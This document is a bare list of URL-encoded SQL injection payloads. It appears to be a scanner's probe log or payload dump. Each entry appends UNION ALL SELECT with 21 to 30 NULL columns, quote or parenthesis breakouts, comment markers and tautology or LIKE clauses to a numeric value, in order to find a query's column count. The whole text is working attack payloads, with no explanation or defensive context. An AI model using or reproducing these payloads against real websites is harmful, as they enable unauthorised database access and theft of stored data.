1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22oRJd%22%20LIKE%20%22oRJd 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22sbST%22%20LIKE%20%22sbST 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22GAft%22%20LIKE%20%22GAft 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22qkQE%22%20LIKE%20%22qkQE 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22Moid%22%20LIKE%20%22Moid 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22WWem%22%20LIKE%20%22WWem 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22ySng%22%20LIKE%20%22ySng 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22kUOt%22%20LIKE%20%22kUOt 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22GYOo%22%20LIKE%20%22GYOo 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22jjWE%22%20LIKE%20%22jjWE 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22rOir%22%20LIKE%20%22rOir 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22ICNh%22%20LIKE%20%22ICNh 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22kmXG%22%20LIKE%20%22kmXG 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22mSYE%22%20LIKE%20%22mSYE 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22mMmt%22%20LIKE%20%22mMmt 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22XTEp%22%20LIKE%20%22XTEp 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22DhHJ%22%20LIKE%20%22DhHJ 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22wDcD%22%20LIKE%20%22wDcD 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22WjAB%22%20LIKE%20%22WjAB 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22cZiO%22%20LIKE%20%22cZiO 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22urYY%22%20LIKE%20%22urYY 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22GSvD%22%20LIKE%20%22GSvD 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22vSPV%22%20LIKE%20%22vSPV 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22Krdc%22%20LIKE%20%22Krdc 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22TeLy%22%20LIKE%20%22TeLy 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22zrYi%22%20LIKE%20%22zrYi 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22vkCR%22%20LIKE%20%22vkCR 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22KOoh%22%20LIKE%20%22KOoh 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22oBcN%22%20LIKE%20%22oBcN 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22PWKQ%22%20LIKE%20%22PWKQ 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22OUBx%22%20LIKE%20%22OUBx 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22vwqE%22%20LIKE%20%22vwqE 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22fWDP%22%20LIKE%20%22fWDP 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22DKIu%22%20LIKE%20%22DKIu 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22iTyF%22%20LIKE%20%22iTyF 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22mOjv%22%20LIKE%20%22mOjv 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22afKj%22%20LIKE%20%22afKj 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22dxVT%22%20LIKE%20%22dxVT 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22hABR%22%20LIKE%20%22hABR 1234.5%29%20WHERE%202063%3D2063%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20WHERE%202153%3D2153%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20WHERE%206774%3D6774%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20WHERE%208232%3D8232%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20WHERE%208679%3D8679%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20WHERE%203164%3D3164%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20WHERE%201753%3D1753%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20WHERE%202241%3D2241%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20WHERE%203983%3D3983%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20WHERE%204616%3D4616%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20WHERE%204160%3D4160%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20WHERE%209497%3D9497%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20WHERE%206047%3D6047%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20WHERE%204249%3D4249%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20WHERE%207175%3D7175%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20WHERE%202271%3D2271%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20WHERE%204054%3D4054%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20WHERE%209060%3D9060%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20WHERE%207446%3D7446%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20WHERE%206609%3D6609%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 